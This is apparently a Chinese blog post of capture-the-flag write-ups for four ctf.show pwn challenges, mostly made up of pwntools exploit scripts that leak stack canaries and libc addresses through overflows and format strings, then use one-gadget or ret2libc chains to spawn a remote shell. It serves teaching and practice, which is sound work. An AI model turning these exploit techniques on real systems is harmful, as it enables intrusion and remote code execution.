PWN-PRACTICE-CTFSHOW-6

最新推荐文章于 2024-04-15 23:47:01 发布
最新推荐文章于 2024-04-15 23:47:01 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: Pwn-CTFSHOW 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122554001
版权

PWN-PRACTICE-CTFSHOW-6

36D杯-MengxinStack

程序开了canary和PIE保护
泄露远程libc版本,为 libc6_2.23-0ubuntu10_amd64.so

from pwn import *
io=remote("pwn.challenge.ctf.show",28124)
io.recvuntil("She said: hello?\n")
payload="a"*0x40+"b"*8
io.send(payload)
io.recvuntil("b"*8)
__libc_start_main_ret=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

泄露canary->覆盖返回地址低字节,重新调用main->泄露libc基地址->覆盖返回地址为one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28124)
elf=ELF("./pwn1")

#泄露远程libc版本
#io.recvuntil("She said: hello?\n")
#payload="a"*0x40+"b"*8
#io.send(payload)
#io.recvuntil("b"*8)
#__libc_start_main_ret=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
#print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

#远程libc
libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")

#泄露canary
io.recvuntil("She said: hello?\n")
payload="a"*32+"b"*8
io.sendline(payload)
io.recvuntil("b"*8)
canary=u64(io.recv(8))-0xa
print("canary=="+hex(canary))

#.text:00000000000207FA                 mov     rax, fs:2F8h
#.text:0000000000020803                 mov     [rsp+0B8h+var_48], rax
#.text:0000000000020808                 lea     rax, [rsp+0B8h+var_98]
#.text:000000000002080D                 mov     fs:300h, rax
#.text:0000000000020816                 mov     rax, cs:environ_ptr_0
#.text:000000000002081D                 mov     rsi, [rsp+0B8h+var_B0]
#.text:0000000000020822                 mov     edi, [rsp+0B8h+var_A4]
#.text:0000000000020826                 mov     rdx, [rax]
#.text:0000000000020829                 mov     rax, [rsp+0B8h+var_A0]
#.text:000000000002082E                 call    rax
#.text:0000000000020830
#.text:0000000000020830 loc_20830:                              ; CODE XREF: __libc_start_main+134↓j
#.text:0000000000020830                 mov     edi, eax
#.text:0000000000020832                 call    exit

#覆盖返回地址低字节,重新调用main
payload="a"*40+p64(canary)+"b"*0x18+"\x16"
io.send(payload)

#泄露libc基址
io.recvuntil("She said: hello?\n")
payload="a"*0x40+"b"*8
io.send(payload)
io.recvuntil("b"*8)
__libc_start_main=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-(0x20830-0x20740)
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
ogg=libc_base+0x45216

#覆盖返回地址到one-gadget
payload="a"*40+p64(canary)+"b"*0x18+p64(ogg)
io.send(payload)

io.interactive()

36D杯-tang

保护全开,这题思路和36D杯-MengxinStack很像
泄露远程libc版本,为 libc6_2.23-0ubuntu10_amd64.so

from pwn import *
io.recvuntil("你怎么了?\n")
io.send("%23$p")
io.recvuntil("0x")
__libc_start_main_ret=int(io.recv(12),16)
print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

泄露canary->覆盖返回地址低字节,重新调用main->泄露libc基地址->覆盖返回地址为one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28026)
elf=ELF("./pwn1")

#泄露远程libc版本
#io.recvuntil("你怎么了?\n")
#io.send("%23$p")
#io.recvuntil("0x")
#__libc_start_main_ret=int(io.recv(12),16)
#print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

#远程libc
libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")

#泄露canary
io.recvuntil("你怎么了?\n")
io.send("%9$p")
io.recvuntil("0x")
canary=int(io.recv(16),16)
print("canary=="+hex(canary))

#.text:00000000000207FA                 mov     rax, fs:2F8h
#.text:0000000000020803                 mov     [rsp+0B8h+var_48], rax
#.text:0000000000020808                 lea     rax, [rsp+0B8h+var_98]
#.text:000000000002080D                 mov     fs:300h, rax
#.text:0000000000020816                 mov     rax, cs:environ_ptr_0
#.text:000000000002081D                 mov     rsi, [rsp+0B8h+var_B0]
#.text:0000000000020822                 mov     edi, [rsp+0B8h+var_A4]
#.text:0000000000020826                 mov     rdx, [rax]
#.text:0000000000020829                 mov     rax, [rsp+0B8h+var_A0]
#.text:000000000002082E                 call    rax
#.text:0000000000020830
#.text:0000000000020830 loc_20830:                              ; CODE XREF: __libc_start_main+134↓j
#.text:0000000000020830                 mov     edi, eax
#.text:0000000000020832                 call    exit

io.recvuntil("烫\n")
io.sendline("P1umH0")

#覆盖返回地址低字节,重新调用main
io.recvuntil("远一点!\n")
payload="a"*56+p64(canary)+"b"*0x18+"\x16"
io.send(payload)

#泄露libc基址
io.recvuntil("你怎么了?\n")
io.send("%23$p")
io.recvuntil("0x")
__libc_start_main=int(io.recv(12),16)-(0x20830-0x20740)
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
ogg=libc_base+0xf1147

io.recvuntil("烫\n")
io.sendline("P1umH0")

#覆盖返回地址到one-gadget
io.recvuntil("远一点!\n")
payload="a"*56+p64(canary)+"b"*0x18+p64(ogg)
io.send(payload)

io.interactive()

1024杯-1024_happy_stack

栈溢出,用"36D\x00"绕过strcmp,然后ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28138)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4006AE
pop_rdi=0x400803
ret=0x40028a

io.recvuntil("qunzhu\n\n")
payload="36D\x00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

io.recvuntil("qunzhu\n\n")
payload="36D\x00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()

1024杯-1024_happy_checkin

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28173)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4005F7
pop_rdi=0x4006e3
ret=0x4004c6

io.recvuntil("ticket\n")
payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

io.recvuntil("ticket\n")
payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
36D杯CTF——mengxinstack
qq_33458986的博客
05-08 425
记录一下36D的mengxinstack题目 下载题目,checksec下分析,开启了很多保护,有canary,64位,IDA分析,知道这个程序先执行了一次read,再把read进去的东西print出来,再read,两次read都会造成栈溢出 观察到程序在运行时候(上图)的栈中有__libc_start_main+235的地址,这个地址其实是__libc_start_main的返回地址即__li...
ctfshow pwn6
qq_39980610的博客
08-22 400
函数栈平衡:保证函数调用前后的栈顶是一致的。所以exp基本一样但是要注意栈平衡。其实就是要进出都是esp(32位)已经提示了是pwn05的64位版。1.外平栈:由函数外部保持栈平衡。2.内平栈:由函数内部保持栈平衡。或者简单理解为函数要正确退出。
CTFshow-PWN-前置基础(pwn6-pwn9)
最新发布
Welcome To Myon'Blog !
04-15 463
立即寻址方式结束后eax寄存器的值为?截取关键代码mov 用于赋值,将右边立即数加载到左边的寄存器 eax 中;add 将寄存器 eax 中的值与立即数 114504 相加,并将结果存储回寄存器eax中;sub 从寄存器eax中的值中减去1,并将结果存储回寄存器eax中。
ctfshow pwn 06
A2247328295的博客
04-14 218
这里需要将payload的先指向retn的地址维持堆栈平衡,最后添加函数的首地址。exp很简单就不解释了,当然这里还可以这样实现,我们直接将地址指向 bin/sh。welcome函数和main函数就不看了,直接看getflag函数。在调用函数时,保证esp能正确恢复入栈之前的状态。可以看到这是一个64位的程序,需要考虑堆栈平衡。
Pwn_CTFShow_01
Trick的博客
11-08 784
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
CTF PWN入坑
Alan-WalkBill的博客
11-17 3057
CTF PWN入门(一) 1.攻防世界get_shell 将下载好的附件用在Linux中打开命令是./ 文件名 发现没有权限,原来需要先添加权限可使用chmod +x ./ 文件名。 然后nc -nv 111.198.29.45 55973链接到远程主机 ***更多chmod介绍https://www.cnblogs.com/peida/archive/2012/11/29/2794010.htm...
5月份36dctf
doudoudedi
05-04 397
exec_comm.constprop+1162kaishell PWN_MengxinStack 栈不会了orz 就是基本的栈溢出操控libc_start_main这个函数来控制程序流程需要将返回地址爆破到libc_start_main+176然后就是基本的ROP了 exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(ip,port,deb...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-200题目文件
02-16
pwn-200题目文件
Ubuntu 通过Deb 安装 MySQL 5.5
12-29
Ubuntu 通过Deb 安装 MySQL 5.5 描述了整个过程 亲测可用
ubuntu离线安装
11-28
Debian和Ubuntu离线安装软件的方法
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 5876
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
学校的简单入门题PWN
EternalBurning的博客
11-09 540
学校的简单入门题PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下,是32位的 看看有没有程序保护,估计是入门题的缘故都没有程序保护: 用32位的ida打开, 要想拿到shell,就得让v6==99,而第11行的read()明显存在栈溢出,双击变量进入函数的栈界面 容易发现,s字符串的长度...
CTFSHOW 36D杯CTF(pwn部分wp)
weixin_44296844的博客
05-04 1756
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
CTF show 萌新赛web
羽的博客
03-06 3274
平台地址:https://ctf.show 0x01 web_签到 源码: <?php if(isset($_GET['url'])){ system("curl https://".$_GET['url'].".ctf.show"); }else{ show_source(__FILE__); } ?> 很明显的命令执行漏洞,我们把前后闭合即可,...
2021 ctfshow 月饼杯 pwn 容易的胖
yongbaoii的博客
09-24 201
保护啥也没有。 看起来似乎是就是一个输入shellcode的过程,但是往哪输入,然后输入进去咋样,题目怎么做,都暂时看不出来,所以需要我们去调试一下。 可以看出来shellcode被放在了0x804a040,这是一个bss上的地址。 我们可以看到,当我们通过’\x00’截断来绕过strcmp正常返回的时候,我们会把ebp-8,也就是v3地方的地址弹到ecx,然后控制了它就可以控制我们函数的返回地址,我们只要让它合适的返回到我们的shellcode上就好啦。 exp from pwn import* .
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值